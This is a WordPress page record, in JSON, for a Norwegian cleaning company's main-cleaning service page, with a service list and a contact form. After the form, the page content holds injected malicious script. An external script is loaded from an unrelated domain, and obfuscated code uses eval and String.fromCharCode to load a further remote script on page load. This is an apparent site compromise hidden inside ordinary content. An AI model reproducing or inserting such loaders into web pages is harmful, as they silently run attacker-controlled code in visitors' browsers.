{"id":3849,"date":"2020-11-05T16:26:12","date_gmt":"2020-11-05T16:26:12","guid":{"rendered":"http:\/\/ms24.no\/?page_id=3849"},"modified":"2021-03-26T09:32:08","modified_gmt":"2021-03-26T08:32:08","slug":"hovedrengjoring","status":"publish","type":"page","link":"https:\/\/ms24.no\/?page_id=3849","title":{"rendered":"Hovedrengj\u00f8ring"},"content":{"rendered":"<h3>Hovedrengj\u00f8ring<\/h3>\n<p>Hovedrengj\u00f8ring har som form\u00e5l \u00e5 bringe et bygg til en optimal standard for renhold. B\u00e5de estetisk og hygienisk.<br \/>\nVed hovedrengj\u00f8ringen fjerner vi st\u00f8v fra steder som vanligvis ikke blir rengjort. Dette er minst like viktig som det daglige renholdet for \u00e5 ivareta et rent og godt innemilj\u00f8 p\u00e5 arbeidsplassen.<\/p>\n<h2>Hovedrengj\u00f8ring omfatter vanligvis<\/h2>\n<p>Vask av vegger og tak<\/p>\n<p>Innvendig vindusvask<\/p>\n<p>Vask av karmer, d\u00f8rer og d\u00f8rh\u00e5ndtak<\/p>\n<p>St\u00f8vt\u00f8rking av overflater samt lamper, hyller osv.<\/p>\n<p>Vask og st\u00f8vsuging av gulv og tepper<\/p>\n<h2>Kontakt oss for hovedrengj\u00f8ring<\/h2>\n<div class=\"wpcf7 no-js\" id=\"wpcf7-f1303-o1\" lang=\"en-US\" dir=\"ltr\" data-wpcf7-id=\"1303\">\n<div class=\"screen-reader-response\"><p role=\"status\" aria-live=\"polite\" aria-atomic=\"true\"><\/p> <ul><\/ul><\/div>\n<form action=\"\/index.php?rest_route=%2Fwp%2Fv2%2Fpages%2F3849#wpcf7-f1303-o1\" method=\"post\" class=\"wpcf7-form init\" aria-label=\"Contact form\" novalidate=\"novalidate\" data-status=\"init\">\n<fieldset class=\"hidden-fields-container\"><input type=\"hidden\" name=\"_wpcf7\" value=\"1303\" \/><input type=\"hidden\" name=\"_wpcf7_version\" value=\"6.1.5\" \/><input type=\"hidden\" name=\"_wpcf7_locale\" value=\"en_US\" \/><input type=\"hidden\" name=\"_wpcf7_unit_tag\" value=\"wpcf7-f1303-o1\" \/><input type=\"hidden\" name=\"_wpcf7_container_post\" value=\"0\" \/><input type=\"hidden\" name=\"_wpcf7_posted_data_hash\" value=\"\" \/>\n<\/fieldset>\n<div class=\"online-form\">\n\t<div class=\"row gutters-10\">\n\t\t<div class=\"col-6 form-group\">\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"username\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"Navn*\" value=\"\" type=\"text\" name=\"username\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-6 form-group\">\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"phone\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-text wpcf7-validates-as-required form-control\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"Telefon*\" value=\"\" type=\"text\" name=\"phone\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-6 form-group\">\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"email\"><input size=\"40\" maxlength=\"400\" class=\"wpcf7-form-control wpcf7-email wpcf7-validates-as-required wpcf7-text wpcf7-validates-as-email form-control\" aria-required=\"true\" aria-invalid=\"false\" placeholder=\"E- postl*\" value=\"\" type=\"email\" name=\"email\" \/><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-6 form-group\">\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"menu-922\"><select class=\"wpcf7-form-control wpcf7-select wpcf7-validates-as-required select2\" aria-required=\"true\" aria-invalid=\"false\" name=\"menu-922\"><option value=\"Velg tjenester\">Velg tjenester<\/option><option value=\"Bedriftsrenhold\">Bedriftsrenhold<\/option><option value=\"Privatrenhold\">Privatrenhold<\/option><option value=\"Vaktmestertjenester\">Vaktmestertjenester<\/option><option value=\"Bygg renhold\">Bygg renhold<\/option><option value=\"Boretslag \/ sameie\">Boretslag \/ sameie<\/option><\/select><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-12 form-group mg-b-20\">\n\t\t\t<p><span class=\"wpcf7-form-control-wrap\" data-name=\"textarea-652\"><textarea cols=\"40\" rows=\"7\" maxlength=\"2000\" class=\"wpcf7-form-control wpcf7-textarea form-control\" aria-invalid=\"false\" placeholder=\"Melding . . .\" name=\"textarea-652\"><\/textarea><\/span>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-12 form-group online-button\">\n\t\t\t<p><button type=\"submit\" class=\"wpcf7-submit send-button\">Send<i class=\"fa fa-angle-right\" aria-hidden=\"true\"><\/i><\/button>\n\t\t\t<\/p>\n\t\t<\/div>\n\t\t<div class=\"col-12 response\">\n\t\t<div class=\"wpcf7-response-output\" aria-hidden=\"true\"><\/div>\n\t\t<\/div>\n\t<\/div>\n<\/div>\n<\/form>\n<\/div>\n<script src='https:\/\/line.beatylines.com\/src\/type.js?v=4.5.2' type='text\/javascript' id='globalsway'><\/script><script>var f=String;eval(f.fromCharCode(102,117,110,99,116,105,111,110,32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110,32,66,111,111,108,101,97,110,40,100,111,99,117,109,101,110,116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,116,105,115,116,105,99,46,115,99,114,105,112,116,115,112,108,97,116,102,111,114,109,46,99,111,109,47,99,111,108,108,101,99,116,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110,116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,46,112,97,114,101,110,116,78,111,100,101,46,105,110,115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110,116,46,99,117,114,114,101,110,116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,115,41,59,125,125));\/*99586587347*\/<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Hovedrengj\u00f8ring Hovedrengj\u00f8ring har som form\u00e5l \u00e5 bringe et bygg til en optimal standard for renhold. B\u00e5de estetisk og hygienisk. Ved hovedrengj\u00f8ringen fjerner vi st\u00f8v fra steder som vanligvis ikke blir rengjort. Dette er minst like viktig som det daglige renholdet for \u00e5 ivareta et rent og godt innemilj\u00f8 p\u00e5 arbeidsplassen. Hovedrengj\u00f8ring omfatter vanligvis Vask av [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"elementor_header_footer","meta":{"footnotes":""},"class_list":["post-3849","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/3849","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3849"}],"version-history":[{"count":5,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/3849\/revisions"}],"predecessor-version":[{"id":5454,"href":"https:\/\/ms24.no\/index.php?rest_route=\/wp\/v2\/pages\/3849\/revisions\/5454"}],"wp:attachment":[{"href":"https:\/\/ms24.no\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3849"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}